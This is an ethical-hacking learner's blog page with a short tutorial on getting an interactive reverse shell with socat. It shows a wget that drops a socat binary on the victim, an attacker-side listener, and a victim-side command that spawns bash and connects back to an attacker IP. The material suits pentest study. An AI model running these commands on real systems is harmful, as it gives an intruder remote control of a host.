<!DOCTYPE html>
<html class="direction--ltr"lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Get Full Interactive reverse Shell With Socat | AbusingLinux</title>
<meta name="generator" content="Jekyll v4.2.2" />
<meta property="og:title" content="Get Full Interactive reverse Shell With Socat" />
<meta name="author" content="isuckatlinux" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Introduction Today we are going to see a nice method to get an interactive reverse shell with socat. A few adventages of use interactive shells are the next ones: Ctrl + C work just fine, when you press it it doesn’t exit the shell, just stop the process is running Autocompletation (Tabuation), in normal reverse shells tabulation just add a tabulation, in interactive shells tabs can autocomplete your code." />
<meta property="og:description" content="Introduction Today we are going to see a nice method to get an interactive reverse shell with socat. A few adventages of use interactive shells are the next ones: Ctrl + C work just fine, when you press it it doesn’t exit the shell, just stop the process is running Autocompletation (Tabuation), in normal reverse shells tabulation just add a tabulation, in interactive shells tabs can autocomplete your code." />
<link rel="canonical" href="https://abusinglinux.com//2022/02/11/get-full-interactive-reverse-shell-with-socat.html" />
<meta property="og:url" content="https://abusinglinux.com//2022/02/11/get-full-interactive-reverse-shell-with-socat.html" />
<meta property="og:site_name" content="AbusingLinux" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2022-02-11T00:00:00+00:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Get Full Interactive reverse Shell With Socat" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"isuckatlinux"},"dateModified":"2022-02-11T00:00:00+00:00","datePublished":"2022-02-11T00:00:00+00:00","description":"Introduction Today we are going to see a nice method to get an interactive reverse shell with socat. A few adventages of use interactive shells are the next ones: Ctrl + C work just fine, when you press it it doesn’t exit the shell, just stop the process is running Autocompletation (Tabuation), in normal reverse shells tabulation just add a tabulation, in interactive shells tabs can autocomplete your code.","headline":"Get Full Interactive reverse Shell With Socat","mainEntityOfPage":{"@type":"WebPage","@id":"https://abusinglinux.com//2022/02/11/get-full-interactive-reverse-shell-with-socat.html"},"url":"https://abusinglinux.com//2022/02/11/get-full-interactive-reverse-shell-with-socat.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/css/style.css">
  <link rel="icon" type="image/png" href="/assets/favicon.png" />
  <link rel="stylesheet" href="/assets/css/magnific-popup.css"><link type="application/atom+xml" rel="alternate" href="https://abusinglinux.com//feed.xml" title="AbusingLinux" /><script src="https://code.jquery.com/jquery-3.2.0.min.js"></script> 
  <script src="/assets/js/jquery.magnific-popup.js"></script>
</head>
<body><div class="site-header">
  <div class="wrapper">
    <a class="site-title" rel="author" href="/">AbusingLinux<b class="command_prompt"></b><b class="blinking_cursor">_</b></a>
    <span class="social_links">
        
        
        <a class="color-cyan-hover" href="https://twitter.com/ISuckAtLinuxxx"><i class="fab fa-twitter-square"></i></a>
        
        
        
        <a class="color-purple-hover" href="https://github.com/isuckatlinux"><i class="fab fa-github-square"></i></a>
        
        
    </span>
  </div>
</div>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        
  <div class="author-box">


<img src="
    /assets/linux.gif
" class="author-avatar" alt="Avatar" />
<div class="description">Hi, Im Pedro García a cybersecurity and ethical hacking learner. I will be sharing on this web site all my knowledge of these particular arts. I hope you enjoy this blog as much as I do writting all this! <3
</div>

</div>


<div class="post">
  <h1 class="post-title">Get Full Interactive reverse Shell With Socat</h1>
  
  <div class="post-tags">
      
      <a class="tag" href="/tag/rce/">rce</a>
      
      <a class="tag" href="/tag/socat/">socat</a>
      
      <a class="tag" href="/tag/reverse-shell/">reverse-shell</a>
      
  </div>
  
  <div class="post-date">Published on 11 Feb 2022</div>
  
  <h2 id="introduction">Introduction</h2>
<p>Today we are going to see a nice method to get an interactive reverse shell with socat.
A few adventages of use interactive shells are the next ones:</p>
<ul>
  <li>Ctrl + C work just fine, when you press it it doesn’t exit the shell, just stop the process is running</li>
  <li>Autocompletation (Tabuation), in normal reverse shells tabulation just add a tabulation, in interactive shells tabs can autocomplete your code.</li>
</ul>

<h2 id="installing-socat">Installing socat</h2>
<p>If we use security-based distros like Kali or Parrot, we should have socat installed, in any case, to install on the attacker’s machine:
In our system:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>apt <span class="nb">install </span>socat
</code></pre></div></div>

<p>Socat may not be installed in the victim’s machine so we first we have to install it.<br />
In this <a href="https://github.com/andrew-d/static-binaries">repo</a> we have a lot of binaries ready to be downloaded and executed, socat is one of this:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat
</code></pre></div></div>

<h2 id="getting-reverse-shell">Getting reverse shell</h2>

<p>In $PORT we can choose a free port like 443</p>

<p>In our attacker’s machine:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>socat file:<span class="s1">'/dev/tty'</span>,raw,echo<span class="o">=</span>0 tcp-listen:<span class="nv">$PORT</span>
</code></pre></div></div>

<p>In our victim’s machine</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./socat <span class="nb">exec</span>:<span class="s1">'bash -li'</span>,pty, stderr, setsid, sigint, sane tcp:<span class="nv">$ATTACKERS_IP</span>:<span class="nv">$PORT</span>
</code></pre></div></div>


</div>


<div class="comments">
<div id="disqus_thread"></div>
<script>
 var disqus_config = function () {
     this.page.url = 'https://abusinglinux.com//2022/02/11/get-full-interactive-reverse-shell-with-socat.html';
     this.page.identifier = '/2022/02/11/get-full-interactive-reverse-shell-with-socat';
     this.page.title = 'Get Full Interactive reverse Shell With Socat';
 };

 (function() {  // REQUIRED CONFIGURATION VARIABLE: EDIT THE SHORTNAME BELOW
     var d = document, s = d.createElement('script');

     s.src = '//https://abusinglinux.com/.disqus.com/embed.js';

     s.setAttribute('data-timestamp', +new Date());
     (d.head || d.body).appendChild(s);
 })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>

</div>




<div class="related">
  <h2>related posts</h2>
  <ul class="related-posts">
    
      <li>
        <h3>
          <a href="/2022/09/07/backdoor-htb-writeup.html">
            Backdoor HTB WriteUp
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2022/07/07/storing-api-credentials-in-Python.html">
            Storing API credentials on Python
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2022/02/06/teacher-htb-writeup.html">
            Teacher HTB Write Up
          </a>
        </h3>
      </li>
    
  </ul>
</div>




  
  <h2>all tags</h2>
  <div class="tag-cloud"><a href="/tag/python/" class="set-1">Python</a> <a href="/tag/cryptography/" class="set-1">cryptography</a> <a href="/tag/eternal-blue/" class="set-1">eternal-blue</a> <a href="/tag/good-practice/" class="set-1">good-practice</a> <a href="/tag/hackthebox/" class="set-5">hackthebox</a> <a href="/tag/moodle/" class="set-1">moodle</a> <a href="/tag/nosqlinyection/" class="set-1">nosqlinyection</a> <a href="/tag/parrot/" class="set-1">parrot</a> <a href="/tag/pentest-basics/" class="set-2">pentest-basics</a> <a href="/tag/python2/" class="set-1">python2</a> <a href="/tag/rce/" class="set-4">rce</a> <a href="/tag/reverse-shell/" class="set-4">reverse-shell</a> <a href="/tag/screen/" class="set-1">screen</a> <a href="/tag/socat/" class="set-1">socat</a> <a href="/tag/wordpress/" class="set-1">wordpress</a> <a href="/tag/writeup/" class="set-4">writeup</a></div>
  




<script>
  let i = 0;
  const text = '';
  const speed = parseInt('50');
  
  function typeWriter() {
    if (i < text.length) {
      document.getElementById('animated-post-description').innerHTML += text.charAt(i);
      i++;
      setTimeout(typeWriter, speed);
    }
  }

  document.getElementById('animated-post-description').style.display = 'initial';
  typeWriter();

  // Image modal
  var $imgs = [];
  $('img').each(function(idx) {
    var obj = {
      src: $(this).attr('src')
    }
    $imgs.push(obj);
    var elem = $(this);
    $(this).click(function() {
      $('.modal').magnificPopup('open', idx);
    });
  });

  $('.modal').magnificPopup({
    items: $imgs,
    type: 'image',
    closeOnContentClick: true,
    mainClass: 'mfp-img-mobile',
    image: {
      verticalFit: true
    }
    
  });
</script>

      </div>
    </main><footer class="site-footer">
  <div class="wrapper">
    <div class="credits"><a href="https://github.com/bitbrain/jekyll-dash">dash</a> theme for Jekyll by <a href="https://github.com/bitbrain">bitbrain</a> made with <i class="fas fa-heart"></i><div class="toggleWrapper">
    <input type="checkbox" class="dn" id="theme-toggle" onclick="modeSwitcher()" checked />
    <label for="theme-toggle" class="toggle">
    <span class="toggle__handler">
      <span class="crater crater--1"></span>
      <span class="crater crater--2"></span>
      <span class="crater crater--3"></span>
    </span>
        <span class="star star--1"></span>
        <span class="star star--2"></span>
        <span class="star star--3"></span>
        <span class="star star--4"></span>
        <span class="star star--5"></span>
        <span class="star star--6"></span>
    </label>
</div>
<script type="text/javascript">
const theme = localStorage.getItem('theme');

if (theme === "light") {
    document.documentElement.setAttribute('data-theme', 'light');
} else {
    document.documentElement.setAttribute('data-theme', 'dark');
}
const userPrefers = getComputedStyle(document.documentElement).getPropertyValue('content');

function activateDarkTheme() {
    document.getElementById('theme-toggle').checked = true;
    document.documentElement.setAttribute('data-theme', 'dark');
    document.documentElement.classList.add('theme--dark');
    document.documentElement.classList.remove('theme--light');
	document.getElementById("theme-toggle").className = 'light';
	window.localStorage.setItem('theme', 'dark');
}

function activateLightTheme() {
    document.getElementById('theme-toggle').checked = false;
    document.documentElement.setAttribute('data-theme', 'light');
    document.documentElement.classList.add('theme--light');
    document.documentElement.classList.remove('theme--dark');
	document.getElementById("theme-toggle").className = 'dark';
	window.localStorage.setItem('theme', 'light');
}

if (theme === "dark") {
    activateDarkTheme();
} else if (theme === "light") {
    activateLightTheme();
} else if  (userPrefers === "light") {
    activateDarkTheme();
} else {
    activateDarkTheme();
}

function modeSwitcher() {
	let currentMode = document.documentElement.getAttribute('data-theme');
	if (currentMode === "dark") {
	    activateLightTheme();
	} else {
	    activateDarkTheme();
	}
}
</script></div>
  </div>
</footer>


<script>
      window.FontAwesomeConfig = {
        searchPseudoElements: true
      }
    </script>
  </body>

</html>
